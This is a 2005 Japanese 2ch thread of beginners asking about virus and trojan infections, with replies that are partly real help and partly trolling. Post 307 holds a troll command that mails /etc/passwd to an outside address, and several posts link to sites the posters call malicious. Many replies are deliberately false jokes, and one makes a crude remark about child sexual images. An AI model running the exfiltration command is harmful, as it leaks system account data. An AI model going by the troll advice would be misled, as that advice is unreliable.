ありがとうございます。
先程、キーボードドライブの設定をやり直してみたのですが、
まだ直っていないようです。
オンラインスキャンしても、悪いところはないし、
一体どうしたらよいのか・・・
304名無しさん@お腹いっぱい。:2005/11/09(水) 15:21:57
  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) < >>303
 | | |  \_____
 (__)___)

「A」キーの横列の対岸が}や」になってるよね。キーボード入力は
基本的にマトリクスセンシングになってるんだ。スキャンコード出力の
問題ではなくて、内部のハードトラブルのような気がする。
305名無しさん@お腹いっぱい。:2005/11/09(水) 18:42:14
IPアドレスってばれたらどうなるんですか?
あとばれた時の対策をおしえてください。
306名無しさん@お腹いっぱい。:2005/11/09(水) 18:51:06
おまいの悪行が全部ばれて逮捕されるぞ。
ばれたらすぐ山に逃げるんだ、山に!
307名無しさん@お腹いっぱい。:2005/11/10(木) 09:41:56

                     cat /etc/passwd | mail [email protected]
                   http://bubble4.2ch.net/test/read.cgi/nendai/1128605930/
         ∧ ∧
        (・∀ ・)  <遠慮なく収めてくれ。 礼など要らぬ....。
        <(  )v     イェーイ!!

























308名無しさん@お腹いっぱい。:2005/11/10(木) 11:25:55
>>305
串・Proxy・IP関連スレッド Vol.35 (パソコン初心者@2ch掲示板)
http://pc7.2ch.net/test/read.cgi/pcqa/1123286827/
309名無しさん@お腹いっぱい。:2005/11/10(木) 12:11:15
age
310名無しさん@お腹いっぱい。:2005/11/10(木) 13:42:05
ウイルスが混入している圧縮ファイルを手動でスキャンした時、
ノートンなら圧縮フォルダ内のウイルスを駆除できるのですが、
ウイルスバスターなら駆除できず、隔離されるのはなぜ??
311名無しさん@お腹いっぱい。:2005/11/10(木) 13:49:35
>>310
仕様
312名無しさん@お腹いっぱい。:2005/11/10(木) 14:21:53
  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) <  >>311 乙 !!
 | | |  \_____
 (__)___)
313名無しさん@お腹いっぱい。:2005/11/12(土) 22:24:15
初めてウイルスに感染したみたいですが
駆除フリーソフトをダウンロードして
駆除したつもりなんですが
まだ安定しません。

ウインドウズXP
OSと一番新しいの
だと思います。

それ以外詳しいことはわからないのですが

思い当たるところは
どうもメモリ部分に感染している
いつもクリック部分に砂時計のようなものが表示される
HPの画像が見れなくなる

大体こんな感じです

思い当たるウイルスを教えてください。




314名無しさん@お腹いっぱい。:2005/11/12(土) 23:00:04
>したみたいですが
>つもりなんですが

  多分、誰も答えないだろうな・・・
315名無しさん@お腹いっぱい。:2005/11/12(土) 23:01:21
初心者なので書き方変だったらすいません
ほんとちうに昨日からおかしいのです
時計が消えないのです
316名無しさん@お腹いっぱい。:2005/11/12(土) 23:16:24
>>313
ブルースウィルス
317名無しさん@お腹いっぱい。:2005/11/12(土) 23:41:57
どう見ても映画俳優です。
本当にありがとうございました。
318名無しさん@お腹いっぱい。:2005/11/12(土) 23:58:45
>>315
いろいろ訊いていって修復する方法もあるけれど
こっちが質問しても答えがわからんだろ?

 おとなしくリカバリーしようや。
319名無しさん@お腹いっぱい。:2005/11/13(日) 01:35:22
ttp://virus.org.ua/unix/woid.jpg
これを踏んでしまいました。重くなり始めてから慌ててLANを引っこ抜いたのですが
どんなウィルスが入っているのでしょうか?
今トレンドマイクロで検索中です。
320319:2005/11/13(日) 01:45:11
オンラインスキャンの結果、ウィルスは見つかりませんでした。
トレンドマイクロのスキャンで引っかからないウィルスとかトロイとかってありますか?
321名無しさん@お腹いっぱい。:2005/11/13(日) 01:50:18
>>320
Operaで開いたらウイルスバスター2006がコレ隔離した。
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML_CRINET.A
あとは自力で対処汁。
322319:2005/11/13(日) 02:01:33
>>321
LAN引っこ抜いたら「telnetに接続できません」って出たのは
これのことだったのですね。
先ほどのオンラインスキャンで引っ掛からなかったのは何故でしょう・・・。
もう一度スキャンして引っ掛かったら削除します。
ありがとうございました。
323名無しさん@お腹いっぱい。:2005/11/13(日) 02:24:58
http://www.grannymax.com/index1.shtml

これを踏んでしまった後IEがおかしくなりました(ファイル保存とかできなくなるとか)
VB2005ではなんのウイルスも発見できなかったんですがどーすればいいでしょうか?
324名無しさん@お腹いっぱい。:2005/11/13(日) 02:29:05
>>323
そんなわけあるか タコが
325323:2005/11/13(日) 02:35:56
いえ・・本当に・・・
WindowsUpdateはしてます
VB2005も最新の状態なんですが検索してもなにも出てこないんです
326名無しさん@お腹いっぱい。:2005/11/13(日) 08:09:39
そういうこともある
諦めろ
327名無しさん@お腹いっぱい。:2005/11/13(日) 10:05:58
>>321
>>323

>>1
【  最  重  要  事  項  】
ウィスルやブラクラだと思われる物の直リンは厳禁!!!!!!!!!!
質問の時は頭の『ht』を抜いて貼り付ける事
328名無しさん@お腹いっぱい。:2005/11/13(日) 10:06:54
スマソ
間違えた

× >>321
>>319
329名無しさん@お腹いっぱい。:2005/11/13(日) 10:43:03
突然落ちたり最新のシステム制御にやられた
Windowsうpだてパッチ当ててればよかったorz
330名無しさん@お腹いっぱい。:2005/11/13(日) 11:27:04
>>323
>>1見てから来い
331名無しさん@お腹いっぱい。:2005/11/13(日) 14:24:12
DION規制で書き込めない・・・・・・・
332名無しさん@お腹いっぱい。:2005/11/13(日) 14:25:21
ぜひお立ち寄り下さいね

http://alink2.uic.to/user/lets5go5.html
333313:2005/11/13(日) 16:05:22
朝からavastで検査していまして
今時間やっとトロイの木馬を発見しましたと
メッセー時でましたが、削除できないみたいです。
よくわからないけど奥深くに進入していたのでしょうか。
昨日は4つ削除できていたけど、まだPCおかしかったので
やっと原因わかったって感度です。
フリーソフトで削除できるのないですか?
334313:2005/11/13(日) 16:08:54
削除ボタン押そうとすると
ファイルが見つかりませんと出ます
詳細押したら
変な英語のページへ飛びました
335313:2005/11/13(日) 16:11:23
Win32:Trojano-2062 [Trj]

これがウイルスでい。
336名無しさん@お腹いっぱい。:2005/11/13(日) 16:33:13
  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) < >>313
 | | |  \_____
 (__)___)

えっと、マルチ(多重感染)の場合は、リカバリを推奨しますが。
337313:2005/11/13(日) 16:36:06
即レスありがとうございます、そうなんですか・・。

画像ファイルもすべて処分が必須でしょうか
338名無しさん@お腹いっぱい。:2005/11/13(日) 16:43:17
>>337
この際だから集めたロリペド画像は全部捨てたら
どうせネットで拾ってきたんだからまた手に入るって
339313:2005/11/13(日) 16:52:28
いえって
うちのわんこたちの成長記録で絶対捨てたくないのです

Unhack Meで駆除しようとしていますが
何度再起動しても同じ名前のウイルスが出てきます

英語で
ハッカーディフェンダー
カタカナで
ルーレット

ハッカーディフェンダールーレットというウイルスが
駆除できない模様です。
340名無しさん@お腹いっぱい。:2005/11/13(日) 16:56:24
  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) < >>337
 | | |  \_____
 (__)___)

えっと、必要なデータ類はバックアップしといて、後で戻す時に
スキャンをかけて下さい。

341313:2005/11/13(日) 17:03:00
モナーさんありがとうございます。

スキャンとはなにでしょうか?
無知ですみません。
342名無しさん@お腹いっぱい。:2005/11/13(日) 17:09:47
ウイルス・スパイウェアの捜索
343313:2005/11/13(日) 18:22:20
なんどもありがとうございます。Unhack Meでいくつかの木馬ウイルスは削除できたのですが
残りが消えません。
やはりデカバリーしか道は残されてないでしょうか。
344名無しさん@お腹いっぱい。:2005/11/13(日) 18:23:30
>>343
デリバリーしろ
345名無しさん@お腹いっぱい。:2005/11/13(日) 18:23:41
>>343
> デカバリー
デリバリーの間違いじゃない?
346名無しさん@お腹いっぱい。:2005/11/13(日) 18:25:34
ばかやろうおまえら!>>313は釣りだ!>>339の「いえって」で気づけ!
347名無しさん@お腹いっぱい。:2005/11/13(日) 18:26:22
正しくはデリバリー
348名無しさん@お腹いっぱい。:2005/11/13(日) 18:33:34
ディスカバリー
349名無しさん@お腹いっぱい。:2005/11/13(日) 18:34:58
デカメロン
350名無しさん@お腹いっぱい。:2005/11/13(日) 18:35:46
若しくはカリクビー
351331:2005/11/13(日) 18:46:09
いえすみません。
本当に初心者です。

とにかく目に付いたウイルス駆除は沢山取り入れて
今全開で調べていますが
なんか5000いじょうウイルスが見つかったみたいです・・。

今はアドウェアというのが見つかったと
サイレンが鳴って削除したところですが
またファイルが見つかりませんとでました。

352名無しさん@お腹いっぱい。:2005/11/13(日) 19:09:33
それなら、なおさらカリクビー しなくちゃ
353331:2005/11/13(日) 19:22:11
やっぱデリバリーみたいです。

とりあえず今はCDみたいなのに画像を移す作業しています

感染日は11/11でどうもライムウエアのファイルで感染した模様です。
354名無しさん@お腹いっぱい。:2005/11/13(日) 19:26:10
ちゃんと避妊しないから
355331:2005/11/13(日) 19:29:49
とりあえず
わんこ成長日記には感染はないみたいでした。

避妊したなかった私のミスです
安全日だったはずですが・・
変な韓国語みたいな文字のをダウンロードしたのですが
多分あれが犯人です。
皆さんも気をつけてください
これからも質問するけど教えてください。
356名無しさん@お腹いっぱい。:2005/11/13(日) 19:34:04
  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) < LimeWire 乙。
 | | |  \_____
 (__)___)
357331:2005/11/13(日) 19:38:56
>>356
市ね

なんか153クリテツィカルと英語でてます。
358331:2005/11/13(日) 19:42:57
今アドウェアで153見つかったトロイを駆除しました
多分消えた予感がします。

では一旦さようなら

どうもありがとう。

消えてない時はもう一度くるので色々教えてください。
359331:2005/11/13(日) 19:46:58
あと>>331は別人でした
すいません
ただしくは
>>311でした。

さような。
360331:2005/11/13(日) 19:47:53
>>311も間違いで

>>313が私でした。

すいてませか。
361名無しさん@お腹いっぱい。:2005/11/13(日) 20:00:20

 リ
  ト
   リ
    ス
362名無しさん@お腹いっぱい。:2005/11/13(日) 20:31:08
>>353
CD−RWドライブが無くて、CD−ROMドライブで焼いたけど無理だった。
ってのは無しな。
363名無しさん@お腹いっぱい。:2005/11/13(日) 20:32:46
  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) < チェンジアップ 乙。
 | | |  \_____
 (__)___)
364名無しさん@お腹いっぱい。:2005/11/13(日) 20:42:28
最近流行ってるというかバラ撒かれてるbravehostみたいなアドレスの、
ニュースソースに偽装したアドレスを誤って踏んでしまったんだが、ただのブラクラ?

念のためウィルススキャンとSpybotのスキャンかけておいたんだが。
365331:2005/11/13(日) 20:45:53
>>362
最近まで変更できなくてRWしかコピーできないと思っていましたが
色々弄くっているうちにRにもコピーできるとわかり
コピーしました。
入れたウイルス検査ではわんこ成長日記は無事通過しました。


しかしトロイの木馬は難儀ですね。
除去してるのに
まだまだウイルスでてきますよ。
まるでどんぐりの背比べですね。
366331:2005/11/13(日) 20:46:49
でもなんか前よりは安定した感じですね。
367名無しさん@お腹いっぱい。:2005/11/13(日) 20:54:21
早めにデリバリー推奨。

てか回線抜いてるよね・・・・ ?
368313:2005/11/13(日) 21:22:20
回線抜いてるの意味わかりません
すみません。

なんか殆ど除去できた感じですが
Maruなんたらってのが、ad-Awareでも消えないみたいで
何度やっても残ってます。

仮にウイルス全部消えたらデリバリーしてなくていいんですか?
369名無しさん@お腹いっぱい。:2005/11/13(日) 21:27:20
>>368
「ウイルス全部消えた」と確信が持てるのならデリバリーしなくていいんじゃない?
でもたいていの人はデリバリーすると思う。
PCに長けている人ほど、デリバリーの重要さを知っている。
370313:2005/11/13(日) 21:33:51
ありかせとうこせさせいます。、親切に

わかりました
明日ちょっとしてみます。
371名無しさん@お腹いっぱい。:2005/11/13(日) 21:47:23
感染したファイルに対するノートンの適用した処理に「アクセスが拒否されました」
というのががあるんですが、具体的にどういった処理なんでしょうか・・・?

処理として不十分(問題未解決)なのか、隔離・検疫にあたる処理(問題解決済)なんでしょうか・・・
因みに、感染場所はインターネット一時ファイルなんですが。。。
372名無しさん@お腹いっぱい。:2005/11/13(日) 21:48:35
失礼、誤爆ですorz
373名無しさん@お腹いっぱい。:2005/11/13(日) 22:54:23
友達のPCがおかしくなりました。
正常に戻す方法があれば、教えてください。
【使用OS】 XP
【WindowsUpdateしてるか】 していない
【AntiVirusは何を使っているか】 使っていない
【ちゃんとUpdateしてるか】 していない
(テンプレ中略)
【症状を具体的に、分かる限りすべて書く】 今日突然ネットにつなげなくなった。
最近、英語のメールがたびたび来ていたらしい。
メールはエクスプローラで受信。
さっき、ついにPC自体がうまく立ち上がらなくなったらしい。
具体的には、起動時に[SONY(中略)ご迷惑をおかけしています(後略)]
みたいな表示が出て、そのあと、普通にWIN旗の画面になったあと、
真っ黒なウィンドにポインタだけがでるだけになってしまったとのこと。

【何をしたらそんなことになったのか】
よくわからない。通常の使用方法は、JPOPのレンタルCDをウィンドズメディアプレーヤ
や、i-Tunesでハードディスクにおとしたり、
ヤフオクで出品・購入など。

【これまでにとった措置】とくになし。
 

【その他の質問】
どうしたら、きちんと起動できるでしょうか?
ウィルスの仕業でしょうか?
リカバリCDで復旧可能ですか?
もっと良い復旧の方法はありますか?
 
初心者です。よろしくおねがいします
374名無しさん@お腹いっぱい。:2005/11/13(日) 22:59:39
>>373
初心者は全員リカバリー
375名無しさん@お腹いっぱい。:2005/11/13(日) 23:03:53
素早いお返事ありがとうございます
リカバリーCDでまたPCつかえるようになるものですか?
リカバリCDでもだめな可能性もありますか?
376名無しさん@お腹いっぱい。:2005/11/13(日) 23:05:32
>>375
やってから聞きやがれ
377375:2005/11/13(日) 23:07:25
ですよね。
やってみます。
すいませぬ
378313:2005/11/13(日) 23:20:55
>>377
諦めて明日一緒にデカバリーしましょうよ
379375:2005/11/13(日) 23:32:39
>>378
私にレスしないでください。
なんか馬鹿にされてるみたいでいやです。
本当に困ってる人に失礼ですよ貴方。
380名無しさん@お腹いっぱい。:2005/11/13(日) 23:34:11
>>373
>【AntiVirusは何を使っているか】 使っていない

ふざけてるんですか?

>>378
「回線抜け」 ってのはあなたのパソコンに侵入しているワームが自己増殖して
ネット上に送信されるのを防ぐ為なんですが・・・

釣り?
381名無しさん@お腹いっぱい。:2005/11/13(日) 23:36:48
( ^3^)≡○#) 3・)∴.;
382375:2005/11/14(月) 00:17:37
いまリカバリCDでリカバリしようとしたらしいのですが
うまくいかなかったみたいです。
あす、直接様子見に逝ってみます。
 
>>375>>373>>377=私ですが
私は>>379ではないのですが、、、?
うぅん?

>>380ふざけてるつもりは無かったみたいですが
まぁ、事実なんで、なんとつっこまれてもしょうがないです。
笑ってあきらめるしかなさそうです。
383名無しさん@お腹いっぱい。:2005/11/14(月) 00:22:01
( ^3^)≡○#) 3・)∴.;
384313:2005/11/14(月) 10:39:17
おはようございます。

>>380
IP電話です。
ネットつないだら危険ということですか?

トロイの木馬殆ど除去できたのですが
まだウイルス残っていて、それがいくらやっても消えないのです・。

Maru-listというやつです。
385313:2005/11/14(月) 10:51:21
なんかやっぱ完璧に消えてないなら増殖してるぽくて
今朝新たにウイルス見つかりました
もうデリバリーしか道はない。
386名無しさん@お腹いっぱい。:2005/11/14(月) 11:45:28
SONY BMG採用のCDコピー防止技術「XCP」
Microsoftが各種マルウェア対策ソフトウェアで
駆除を予定していることが明らかになった。
ttp://www.itmedia.co.jp/news/articles/0511/13/news003.html
387名無しさん@お腹いっぱい。:2005/11/14(月) 11:59:04
【使用OS】 XPSP2
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 ウイルスバスター2006
【ちゃんとUpdateしてるか】 昨日したとこ
【スキャンした結果(ウイルス名・発見場所)】
PE_PARITE.A-1が主にDocuments and Settings内のtempフォルダから検出
PE_PARITE.Aはexeファイルに多数検出
【別のオンラインスキャンしたならその結果は】 同じ
【症状を具体的に、分かる限りすべて書く】
下の「措置」をしたらセーフモードでは起動するのに
通常モードで起動したらユーザ選択後、
設定している壁紙が表示されるだけでタスクバーやアイコンは表示されない。
タスクマネージャーは起動できる模様。
【何をしたらそんなことになったのか】
昨日のウイルススキャンで発見したがいつ入ったかは・・・・
【これまでにとった措置】
トレンドマイクロに載っている削除方法を試してみた。
スキャンで出てきたPE_PARITE.A-1を全て削除し、
セーフモードでレジストリのPINFも削除。
その後に再起動したら上の症状になった。
その上、何度削除してもtmpファイルが別名で作成されるのが困るorz

とりあえずタスクバーやアイコンを表示するにはどうすれば良いでしょうか。
アドバイスお願いしますorz
388名無しさん@お腹いっぱい。:2005/11/14(月) 16:10:28
  /\___/\
/ ⌒   ⌒ ::: \
| (●), 、(●)、 |    / ̄ ̄ ̄ ̄ ̄
|  ,,ノ(、_, )ヽ、,,   |  < >>387
|   ト‐=‐ァ'   .::::|    \_____
\  `ニニ´  .:::/
/`ー‐--‐‐―´´\


いや、たぶん、文章長いんで、みんな読むのがめんどくさいんだと思う。
389 ◆N9P3SuvBPo :2005/11/14(月) 17:50:09
>387
オメーよ?
>PE_PARITE.A
はwinnyやってないと感染しないはずなんだが。
自分でなんとかしなさい。
390名無しさん@お腹いっぱい。:2005/11/14(月) 19:02:27
>>387
exeを実行する時には最低でもレジストリの変更点は監視していないとね。
391名無しさん@お腹いっぱい。:2005/11/14(月) 20:31:33
>>387
リカバリマジオススメ
392名無しさん@お腹いっぱい。:2005/11/14(月) 21:07:45
フォルダ偽装のトロイ(Torojan Horse)をうっかり踏んでしまいました。
解凍前にノートン(定義は最新です)でスキャンしたときには探知できませんでした。
踏んだ後、ノートンのアクセスが拒否され、削除できないと表示されました。

その後のシステムスキャンやオンラインスキャンではなにも検出されず、
今のところ目に見える被害もありません。

心配なのでリカバリすることにためらいはないのですが、
感染時に接続していたUSBメモリや外付けのHDの中身も
あきらめたほうがよいのか判断しかねています。
上記のように、ノートンで事前に探知できなかったので、
リカバリ後に外付けのものからの再感染が心配なのですが、
大丈夫なのでしょうか?
393名無しさん@お腹いっぱい。:2005/11/14(月) 23:43:20
【使用OS】WindowsXP SP1
【WindowsUpdateしてるか】SP2以外はしてます
【AntiVirusは何を使っているか】avast!4 HomeEdition + BitDefenderFreeEdition
【ちゃんとUpdateしてるか】してます(というか自動アップデートなので)
【スキャンした結果(ウイルス名・発見場所)】Win32:TipSea-E [Trj] 発見場所:C:WINDOWS\system32\rk.bin
【症状を具体的に、分かる限りすべて書く】これといって目立った症状はなし(なんか重い・・・とは思ったけども)
【何をしたらそんなことになったのか】system32フォルダなどいじくった覚えはありません。
【これまでにとった措置】該当ファイルの隔離
394名無しさん@お腹いっぱい。:2005/11/15(火) 13:31:31
>>393
sp2にアップデートできないの?
395名無しさん@お腹いっぱい。:2005/11/15(火) 13:36:09
>通常モードで起動したらユーザ選択後、
>設定している壁紙が表示されるだけでタスクバーやアイコンは表示されない。

ユーザーは管理者を選択してる?
新しいユーザーが作られてるんじゃないの?
396名無しさん@お腹いっぱい。:2005/11/15(火) 14:02:49
スイマセン。ウインドウが勝手にいっぱいでてきて、外国のサイトに
繋がるんですが…。
勝手にショートカットまでできてます。
どう考えてもウィルスですよね?
397名無しさん@お腹いっぱい。:2005/11/15(火) 15:30:13
>>396
とりあえず回線切っとけ・・・
398名無しさん@お腹いっぱい。:2005/11/15(火) 16:09:30
まずは回線切ってPCの電源落とせ。
念のため電話とFAXとTVのコード抜いて
携帯やモバイル機器も電源切っておけ。
全部済んだら続きを質問しに来い。
399名無しさん@お腹いっぱい。:2005/11/15(火) 16:10:12
ウイルス駆除をお店みたいなのでしてもらうときって、
お気に入りに入れてるものとか、消えますか?
400MONA ◆ApRjtwCQJQ :2005/11/15(火) 16:20:21
  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) < >>396
 | | |  \_____
 (__)___)

どう考えてもスパイウエア系だよ。
チッチキチーなこと言ってたらだめだよ。
401MONA ◆ApRjtwCQJQ :2005/11/15(火) 16:23:16
  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) < >>399
 | | |  \_____
 (__)___)

場合によっては消されるかも。
Backupとっとけば。
402名無しさん@お腹いっぱい。:2005/11/15(火) 19:17:48
OpenJaneDoe使っています。
セキュリティソフトはノートンです。
お気に入りで「年代別」にあるスレが6つあります。
それを、お気に入りのログ一覧でスレを見ようとしたらエラーになります。
その後、「年代別」の板を開けると、スレが見れるようになります。
ところが、「年代別」の板を閉じると、ウイルス警告が出ます。

ウイルス名 Unix.Penguin
ファイルは自動的に削除されました。

と表示されます。
この表示を出さないようにしたいのですが、どうすればよいでしょうか?
「年代別」の板にウイルスが貼り付けてあるのかな?
403名無しさん@お腹いっぱい。:2005/11/15(火) 19:22:34
>>402
とりあえず>>10嫁。
404名無しさん@お腹いっぱい。:2005/11/15(火) 20:18:13

質問ですがPDA用のウィルス対策ソフトってあるのでしょうか。
405名無しさん@お腹いっぱい。:2005/11/15(火) 20:20:52
インターネットのサイトに入る前に、そのサイトにウイルスがあるか確認することはできますか?
学校の奴を使うので、ウイルスに感染すると、自己責任になってしまうんです。
他、何か注意しなければいけないことがあったら、教えて下さい。
よろしくお願いします。殆ど素人です。
406名無しさん@お腹いっぱい。:2005/11/15(火) 20:33:40
>>405
ならこのスレ自体見ないほうがいいよw
このスレひらいた時点で感染するから
407名無しさん@お腹いっぱい。:2005/11/15(火) 20:50:02
>>406
携帯でもですか?
408名無しさん@お腹いっぱい。:2005/11/15(火) 20:58:07
>>405
確認することは難しいと思います。
怪しいリンクや,URLに行かなければ大丈夫だと思いますが。
ソースチェッカーなどを使えばブラクラ等確認することができます。

http://so.7walker.net/guide.php
409名無しさん@お腹いっぱい。:2005/11/15(火) 21:22:53
すいません マイラーダエモンって方からメールがきたのですが
ウィルスでしょうか?
410名無しさん@お腹いっぱい。:2005/11/15(火) 21:26:56
それドラえもんみたいなもんだから気にしないでいいよ>>409
411名無しさん@お腹いっぱい。:2005/11/15(火) 22:13:16
圧縮ファイルをスキャンしたらトロイの木馬が発見されたんですけど解凍してないから感染はしてないんですか?
412名無しさん@お腹いっぱい。:2005/11/15(火) 22:48:28
>>411
解凍したって感染なんてしません
413名無しさん@お腹いっぱい。:2005/11/15(火) 23:26:54
>>412
そうなんですか?初心者なんで全然分かんなくて…
414名無しさん@お腹いっぱい。:2005/11/15(火) 23:39:10
415405:2005/11/15(火) 23:58:43
>>408
ありがとうございます!気をつけてやりたいと思います!
416名無しさん@お腹いっぱい。:2005/11/16(水) 00:23:08
マルチで向こうに質問中


ttp://pc8.2ch.net/test/read.cgi/sec/1130538758/459
459 :名無しさん@お腹いっぱい。 :2005/11/15(火) 23:06:17
このソフトで圧縮されてるファイルをスキャンしたらトロイの木馬が発見されたんですけど解凍しないで削除したんで感染はしてないんですか?
初心者なんで教えてください!
417名無しさん@お腹いっぱい。:2005/11/16(水) 02:45:22
板違いかもしれないけど、教えてチョ。
http://www2.elecom.co.jp/products/LD-BBR4L3.html
オイラね、上記のルータもってるんだけど、XBOXとPS2にDMZ機能を使っておうと思うんだ。
そしてPC一台はDMZを使わずに接続しようと思うんだ。
XBOXとPS2はDMZにしても安全そうな気がするんだけど、どうかな?
それとDMZ機能は指定したIPアドレスのクライアントだけをWAN側に解放する機能だから
XBOXとPS2にDMZを使っても、IPアドレスが違うPCの方は安全だよね?

前にも同じ事他で聞いたけど、その時はPCは安全じゃないって言われたんだ。
でもDMZ機能をネットで検索して少し勉強してみたら、安全そうに思えてきたんだよね。
どうなんだろう?
418名無しさん@お腹いっぱい。:2005/11/16(水) 07:25:08
キーロガーに感染したみたいなのですが、
確認する方法とかってありますか?
Spybot、Ad-Aware、ウィルスバスターなどで検索したのですが
それらしいものがHITしなかったのでよろしければお願いします。
419名無しさん@お腹いっぱい。:2005/11/16(水) 07:47:43
>キーロガーに感染したみたい
どうやって知ったんだ?
420名無しさん@お腹いっぱい。:2005/11/16(水) 07:57:57
2ちゃんねるに外国ソフトウェアのリンク
        ↓
DLして実行してみる(検索してもウィルスと出なかった。)
        ↓
何にも起きない
        ↓
他のウィルスソフト使ってる人がキーロガーじゃんと言う(複数)
        ↓
     ・・・・・・・・・
ですorz
421名無しさん@お腹いっぱい。:2005/11/16(水) 08:09:36
>>420
そんな2ちゃんねる上の不特定多数の発言を信じるより、自分自身を信じろ!
感染したと出なかったら、感染していないんだよ!もっと自分に自信を持て!
422名無しさん@お腹いっぱい。:2005/11/16(水) 08:11:34
>>421
いやいや、発言を信じたわけじゃないよ、
自分でその人が言ってたウィルスソフト入れて検索したらキーロガーだったんだよ。
423名無しさん@お腹いっぱい。:2005/11/16(水) 08:27:04
>>418=>>422だったら、発言が矛盾している&おまえはもう解決している
424名無しさん@お腹いっぱい。:2005/11/16(水) 08:34:39
>>423
だといいんだが・・・
>>442
のウィルスソフトで検索したときにHITしたのはDLした元のファイルが検出されただけで、
レジストリとかのほうでは1つもでてこなかった
実行して感染してないならそれに越したことはないのだが
どうも納得がいかない、元のファイルを駆除すればキーロガーが消えるというのなら別なのだが・・・。
425名無しさん@お腹いっぱい。:2005/11/16(水) 08:35:20
>>442じゃなくて>>422なorz
426名無しさん@お腹いっぱい。:2005/11/16(水) 16:19:31
( ^3^)≡○#) 3・)∴.;
427名無しさん@お腹いっぱい。:2005/11/17(木) 08:21:54
age
428名無しさん@お腹いっぱい。:2005/11/17(木) 08:46:08
【使用OS】 2000
【WindowsUpdateしてるか】 してる
【AntiVirusは何を使っているか】 Mc Afee
【ちゃんとUpdateしてるか】 自動
【スキャンした結果(ウイルス名・発見場所)】 見つからない
Mc Afee が駆除しようとするファイルのみ
【別のオンラインスキャンしたならその結果は】 見つからない
【症状を具体的に、分かる限りすべて書く】
ダウンロードしようとしたたEXEファイルに見つかる
キャッシュされた時点でMc Afee が駆除
いくつかのダウンロードサイトや、企業ページから
ダウンロードしようとしても状態が変わらないので
常駐していて、EXEに組み込まれるのだと思われる
【何をしたらそんなことになったのか】 不明
【これまでにとった措置】
ウイルスの情報を調べたが載っていない
検知された名称はProcKill-DF

亜種がいくつかありそれぞれ駆除方法や症状が異なるようだ。
新種と思われるので情報が欲しい
駆除方法・感染源・症例・発生分布 等
429名無しさん@お腹いっぱい。:2005/11/17(木) 11:15:33
430名無しさん@お腹いっぱい。:2005/11/17(木) 11:29:48
今日家のパソコンを立ち上げたら、突然画面の表示が大きくなっていました。
コントロールパネル等で色々試したのですが、設定が元に戻りません・・・。
これってウィルスの仕業なんでしょうか?
前の日に韓国の、PVの見れるサイトを見たことが原因かなと思っているんですが、
わかる方いらっしゃったら何か教えてもらえないでしょうか??
よろしくお願いします。
431名無しさん@お腹いっぱい。:2005/11/17(木) 11:30:42
>>428
1 トロイみたいだから、プロセス見る。
2 おかしなプロセスあったら切る。
3 スキャン。
4 セーフモードでスキャン。

これしか、手立てが今のところないのでは?
432名無しさん@お腹いっぱい。:2005/11/17(木) 11:40:39
あと、システムを復元しないにして、スキャンする。
433名無しさん@お腹いっぱい。:2005/11/17(木) 11:49:08
>>430
再起動したか?
434名無しさん@お腹いっぱい。:2005/11/17(木) 11:55:03
>>433
何回もしたんですけど、やっぱり直らないんです・・・・。
435名無しさん@お腹いっぱい。:2005/11/17(木) 11:58:34
>>434
ドライバ上書きしてみたら?
それ以前にサポートに電話した方が早そうだが。
436名無しさん@お腹いっぱい。:2005/11/17(木) 12:03:08
>>435
ドライバ上書きとは??
文字を打ち込むとき、半角全角キーを押すと、「、」が入力されるんですけど、
完全にやられてるかな?
437名無しさん@お腹いっぱい。:2005/11/17(木) 12:04:43
>>430
突然画面の表示が大きくなってとは解像度が変わったと言う事かな
まあ、今の処ウィルス等では無いと思う設定がPVを見て変えられたの
では無いだろうか
438名無しさん@お腹いっぱい。:2005/11/17(木) 12:06:13
画面のプロパティの設定の解像度はどうなってるよ
439名無しさん@お腹いっぱい。:2005/11/17(木) 12:08:49
解像度って、16色というやつ?
すいませんど素人で・・・
440名無しさん@お腹いっぱい。:2005/11/17(木) 12:10:58
なわけないだろ!
441名無しさん@お腹いっぱい。:2005/11/17(木) 12:12:14
>>437
PVを見たとき、フルスクリーンにして見ていたんです。
なんか、そのサイズになってしまった感じです・・・。
442名無しさん@お腹いっぱい。:2005/11/17(木) 12:12:23
>>439
それは画面の色
横に解像度あるでしょ
443名無しさん@お腹いっぱい。:2005/11/17(木) 12:12:52
泣泣
444名無しさん@お腹いっぱい。:2005/11/17(木) 12:14:15
小、640x480ピクセル??
445名無しさん@お腹いっぱい。:2005/11/17(木) 12:15:55
>>430
安心しろ!!ウィルスでは無いからアッチ(・∀・)イケ!!
446名無しさん@お腹いっぱい。:2005/11/17(木) 12:30:56
こんぶとわかめの違いって何ですか?
どちらもウイルス対策ソフトは反応しないですよね?
447名無しさん@お腹いっぱい。:2005/11/17(木) 15:04:02
tp://tmp5.2ch.net/test/read.cgi/youth/1132171754/

ついうっかりしていて上記スレの>>1を踏んでしまいました・・・。
悪質なウィルスみたいです。一応ノートンを使用していて、
高危険度と出て削除はしてくれましたが心配です。
ノートンだけじゃ検出できないウィルス等、入っているのでしょうか?
今のところは何もないのですが念のためスキャン中です。
何か起こらないかとても怖いので、
優しい方がいましたらノートンだけで安全だったかどうか教えて下さい。

【使用OS】 WinXP プロフェッショナル
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】 Norton
【ちゃんとUpdateしてるか】 してます
【スキャンした結果(ウイルス名・発見場所)】 今やってます。今のところは無しですが・・・
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】 今のところは何もありません
【何をしたらそんなことになったのか】 上記スレの>>1のURLをうっかりクリック
【これまでにとった措置】 スキャン中
【その他の質問】 もし、ひどいウィルスだったとすればどのような措置をとればいいのか。
448名無しさん@お腹いっぱい。:2005/11/17(木) 15:09:22
うっかりって…
自分自身のセキュリティの管理能力だろ!
甘いんじゃねぇの?
449名無しさん@お腹いっぱい。:2005/11/17(木) 15:12:56
>>447
なにが優しい方だよ氏ね
